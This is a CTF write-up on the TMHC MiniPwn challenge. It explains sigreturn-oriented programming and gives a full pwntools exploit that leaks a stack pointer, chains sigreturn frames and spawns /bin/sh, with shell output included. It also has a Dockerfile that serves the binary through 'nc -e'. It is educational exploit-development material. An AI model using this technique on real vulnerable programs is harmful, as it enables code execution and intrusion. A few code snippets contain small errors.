10 minutes
Abusing Signals with SIGROP Exploits
TMHC: MiniPwn Walk-through
This one’s just as much for me as it is for you. They say you don’t truly understand something until you’re able to teach it to someone else. So here we go!
The Many Hats Club had a CTF on HackTheBox a few weekends ago that re-ignited a previous passion for exploit development. The reason it got me interested was that it required a new exploit technique of which I’d not yet heard, Signal Return Oriented Programming. Check out this whitepaper
Basically, if you can control the Accumulator Register (AX) and reach a SYSCALL instruction, you can send a SIGRET signal to the process. You can read more about Signals here. When a process receives a SIGRET signal, it takes the current stack frame and writes it to the registers. If you’re controlling the stack, then you can ostensibly create your own set of registers in a manner that places you in a more advantageous position during your exploit.
The Challenge
The challenge was a very small binary, hand written in assembly. The stack was not executable (NX), and even if you had gadgets, there’s nowhere all that useful to jump.
Here’s the strace
❯❯ strace ./pwn
execve("./pwn", ["./pwn"], 0x7ffcfe4a4a50 /* 57 vars */) = 0
read(0, AAAAAAA
"AAAAAAA\n", 300) = 8
write(1, "AAAAAAA\n", 8AAAAAAA
) = 8
exit(1) = ?
So it just echos back what we type at it.
Here’s the complete assembly (with comments by me):
_start: ; 0x400000
push 0x40101e ; push _write
mov edi,0x0 ; 1st arg to the upcoming syscall. read from FD 0, STDIN
mov rsi,rsp ; copy stack pointer to RSI, the 2nd argument for the upcoming syscall
sub rsi,0x8 ; subtract 0x8 from where the stack starts; the buffer will be 8 bytes
mov edx,0x12c ; use 300 as the 3rd argument to the upcoming read syscall, count
mov eax,0x0 ; set the first argument to 0, which is sys_READ
syscall ; get user input; IMPORTANT: return value (input length) goes to RAX
_write: ; 0x40101e
push 0x40103c ; push _exit
mov rsi,rsp ; 2nd arg, buffer location
sub rsi,0x8 ; move back 8 bytes
mov edx,0x8 ; how much data to write, 8 bytes
mov eax,0x1 ; which syscall to run; 1 = sys_WRITE
mov edi,0x1 ; which descriptor to write to; 1 = STDOUT
syscall ; write buffer to stdout
_exit: ; 0x40103c
mov eax,0x3c ; 60; exit syscall
syscall ; exit
That’s it.
So let’s get into an overview of what our solution is going to entail. The first thing to know is that our buffer is 8 bytes. We can determine that by either looking at the assembly or with the traditional pattern create/query. We’ll also need know the binary’s security measures. The remote box has ASLR enabled, which we would have found later; we’ll proceed with that as a given.
pwndbg> checksec
[*] '/home/terrance/Dropbox/Blogs/security/content/post/minipwn/pwn/pwn'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
We can take two paths from here. We can SIGROP an mprotect syscall to re-enable execution on the
stack. Doing so would enable execution of shellcode from the stack again, defeating NX. Or we can
SIGROP to the execve syscall and spawn /bin/sh
. Mprotect is the easier path, and is the intended
solution. It wasn’t the path I initially took.
Being the glutton for punishment that I am, let’s continue with the execve syscall route.
The return value from SYS_read
is the size of bytes read and is stored at RAX
happens to be where the syscall
instruction looks to see which syscall function it should be
running. SYS_sigreturn
is syscall 15 according to
this handy syscall table.
Here’s our plan:
- Overwrite the stack and force an address leak.
- Calculate some consistent known offset since ASLR is on.
- Restart the program without quitting, setting it back to a vulnerable state
- Overwrite again, this time setting up a read
- Since we can hand-write the stack frame that ends up in the registers, we’ll set
to our known offset. Additionally, we’ll set up aSYS_read
in the frame so we can continue sending the binary some more data.
- Since we can hand-write the stack frame that ends up in the registers, we’ll set
- Set up our buffer for more control flow and add another SIGRET frame, this time for
- Trigger the SIGRET by sending 15 bytes
- Maybe shell
The Exploit
I took the opportunity, as a supplemental exercise, to also get very familiar with the pwntools
exploit-writing library for Python. I’ll be trying to use as few ‘magic’ numbers as possible and
use the library to its fullest potential.
This is the skeleton I’m going to start with:
#!/usr/bin/env python
from pwn import *
import sys
BIN = "./pwn"
def setup_pipe(gdb_commands):
if len(sys.argv) < 2:
log.error("Run mode missing: [debug, local, remote <server> <port>]")
terminal=["tmux", "splitw", "-h"]
opt = sys.argv[1]
if opt == "debug":
context.log_level = "debug",
io = gdb.debug(BIN, gdb_commands)
elif opt == "remote" && len(sys.argv) == 4:
HOST, PORT = sys.argv[2], sys.argv[3]
io = remote(HOST, PORT)
elif opt == "local":
io = process(BIN)
log.error("Run mode missing: [debug, local, remote <server> <port>]")
log.info("Run mode: {}".format(opt))
return io
if __name__ == "__main__":
commands = """
b _start
elf, rop = ELF(BIN), ROP(BIN)
io = setup_pipe(commands)
We can start by declaring some constants that we’ll need for the exploit. Let’s get some info first:
pwndbg> disass _start
Dump of assembler code for function _start:
0x0000000000401000 <+0>: push 0x40101e
0x0000000000401005 <+5>: mov edi,0x0
0x000000000040100a <+10>: mov rsi,rsp
0x000000000040100d <+13>: sub rsi,0x8
0x0000000000401011 <+17>: mov edx,0x12c
0x0000000000401016 <+22>: mov eax,0x0
0x000000000040101b <+27>: syscall
0x000000000040101d <+29>: ret
pwndbg> disass _write
Dump of assembler code for function _write:
0x000000000040101e <+0>: push 0x40103c
0x0000000000401023 <+5>: mov rsi,rsp
0x0000000000401026 <+8>: sub rsi,0x8
0x000000000040102a <+12>: mov edx,0x8
0x000000000040102f <+17>: mov eax,0x1
0x0000000000401034 <+22>: mov edi,0x1
0x0000000000401039 <+27>: syscall
0x000000000040103b <+29>: ret
From here, we generate our address constants:
syscall = elf.sym._start + 27 # 0x401016
ret2read = elf.sym._start + 22 # 0x401016
ret2write = elf.sym._write + 17 # 0x40102f
_start = elf.sym._start + 5 # we want to skip pushing _write to the stack
Building our first overwrite of the stack:
Overflow the next two return addresses:
First, ret to (mov eax,0x1) to cause a write syscall. Doing this
makes execution skip the part of _write that sets the output length
to just 8. This makes it print the 0x12c bytes set at 401011,
causing pointer leaks
Next, ret to _start+5 to skip pushing _write at 0x401000. This also
sets up the binary to begin listening again with an 8 byte buffer,
putting it back into an overflowable/vulnerable state.
log.info("Sending initial payload to leak pointers")
data = b"A" * OFFSET
data += p64(ret2write) # Leak pointers
data += p64(_start) # Reset
Now we deal with the data that we’ve forced the application to echo back to us:
The 4th giant-word is an environment variable pointer.
'&' it with 0xfffffffffffff000 to find the beginning of the page.
This is our new, known base/offset that remains consistent between
runs, even with ASLR
leaks = p.recv()
pointer = leaks[3*8:4*8]
stack_leak = u64(pointer) & 0xfffffffffffff000
log.warn('leaked stack: ' + hex(stack_leak))
We can create a function that will generate us our SIGRET frame to keep the code a little cleaner:
Build a SIGRETURN SYS_read frame that reads 2000 bytes.
def sigreturn_read(read_location):
frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = constants.STDIN_FILENO
frame.rsi = read_location
frame.rdx = 2000
frame.rsp = read_location
frame.rip = syscall
return bytes(frame)
Overflow again thanks to the SYS_read we setup from the 1st payload
First, reset binary to into a read state. To this read, we will
soon pass 15 bytes to manipulate RAX (read return value of # bytes read)
Next, ret to a syscall to trigger the SIGRETURN
Also, send the SIGRETURN Frame
log.info("Sending stage 2 which seeds the first SIGRETURN frame")
data = b"A" * OFFSET
data += p64(ret2read)
data += p64(syscall)
data += sigreturn_read(stack_leak)
Now we trigger the SIGRET by sending 15 bytes (remember the SIGRET number is 15 and the return
value of SYS_read
is the number of bytes read, and this return value gets stored in RAX)
Trigger SIGRETURN by sending 15 bytes to the binary when it's
reading, which sets RAX to 15. When execution meets a syscall
instruction, the frame above will replace all the register values
log.info("Triggering the first SIGRETURN by sending 15 junk bytes")
p.send(b'B' * constants.SYS_rt_sigreturn)
The SIGRET frame we built earlier has now been pulled into the registers.
rax = 0 # SYS_read
rdi = 0 # STDIN File Descriptor
rsi = our calculated page-start address
rdx = 2000 # arg to sys_READ for how many bytes to read
rsp = our calculated page-start address
rip = our syscall address
Execution continues to a syscall
instruction, because that’s where we set RIP in our frame. Given
our now known stack-base, we can now build out our own stack and track our own offsets. We’ll set
up another SYS_read which will read 15 bytes to set RAX and then ret to a syscall to trigger the
SIGRETURN. We can calculate where the end of the payload (previous 2 instruction plus our custom
stack frame) will be. Once triggered, /bin/sh
will be at RSP.
Build a SYS_execve SIGRETURN frame that will execute /bin/sh
The binsh address in the stack will eventually hold '/bin/sh'
followed by a pointer to null, followed by a pointer to binsh's
pointer, in order to satisfy execve's second argument, and array
of args, hence the +16
execve(*program, *args{program, null}, null)
def sigreturn_execve(binsh_addr):
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh_addr
frame.rsi = binsh_addr + 16
frame.rdx = 0
frame.rip = syscall
return frame
binsh = b"/bin/sh\x00"
payload = p64(ret2read)
payload += p64(syscall)
end_of_payload = stack_leak + len(payload) + SIGRET_FRAME_SIZE + len(binsh)
frame = sigreturn_execve(end_of_payload)
frame.rsp = end_of_payload
payload += bytes(frame)
# ^ 'end_of_payload'
payload += binsh
payload += b"\x00" * 8
payload += p64(end_of_payload)
Reset to vuln state
log.info("Resetting the binary to a vulnerable read state and sending 2nd SIGRETURN execve payload")
p.send(b"A" * OFFSET + payload)
Send 15 bytes to trigger SIGRETURN again, executing /bin/sh
log.info("Triggering the last SIGRETURN")
p.send(b'C' * constants.SYS_rt_sigreturn)
That should be all we need. When we run our final payload, we get:
❯❯ python minipwn.py local
[*] '/home/terrance/Dropbox/Blogs/security/content/post/minipwn/pwn/pwn'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './pwn': pid 3587974
[*] Sending initial payload to leak pointers
[!] leaked stack: 0x7ffff9555000
[*] Sending stage 2 which feeds the first SIGRETURN frame
[+] Waiting: Done
[*] Triggering the first SIGRETURN by sending 15 junk bytes
[+] Waiting: Done
[*] Resetting the binary to a vulnerable read state and sending 2nd SIGRETURN execve payload
[+] Waiting: Done
[*] Triggering the last SIGRETURN
[+] Waiting: Done
[*] Switching to interactive mode
$ whoami
Works on my machine! Well, let’s test it “remote”. Here’s the CTF’s Dockerfile which will set up the challenge for remote pwning. You can tie the binary together with netcat or socat as well.
FROM alpine:latest
RUN mkdir /app
COPY pwn /app/
COPY flag.txt /app/
RUN chmod +x /app/pwn
RUN adduser imth -D -s $(which nologin)
USER imth
ENTRYPOINT ["nc", "-lkvp", "1337", "-e", "/app/pwn"]
Run with:
docker build -t minipwn .
docker run -p 1337:1337 --rm minipwn
Then test the exploit remotely:
❯❯ python minipwn.py remote 1337
[+] Opening connection to on port 1337: Done
[*] Run mode: remote
[+] Opening connection to on port 1337: Done
[*] Run mode: remote
[*] Sending initial payload to leak pointers
[!] leaked stack: 0x7ffc178a6000
[*] Sending stage 2 which feeds the first SIGRETURN frame
[+] Waiting: Done
[*] Triggering the first SIGRETURN by sending 15 junk bytes
[+] Waiting: Done
[*] Resetting the binary to a vulnerable read state and sending 2nd SIGRETURN execve payload
[+] Waiting: Done
[*] Triggering the last SIGRETURN
[+] Waiting: Done
[*] Switching to interactive mode
$ id
uid=1000(imth) gid=1000(imth)
$ cat flag.txt
Hopefully that was clear. I know I’ll be referring back to this when I run into a similar problem again during a CTF. I’ve provided the challenge binary, commented exploit script, Dockerfile, and flag file in an archive here
The official binaries, write-up and solution script using Mprotect can be found here https://github.com/TheManyHatsClub-CTF/TheManyHatsClubCTF/tree/master/2019/pwn/miniPWN
If you see any errors or have suggestions on better ways to explain something in the post, please let me know. This was a learning experience for me as well as an attempt to share newly acquired knowledge.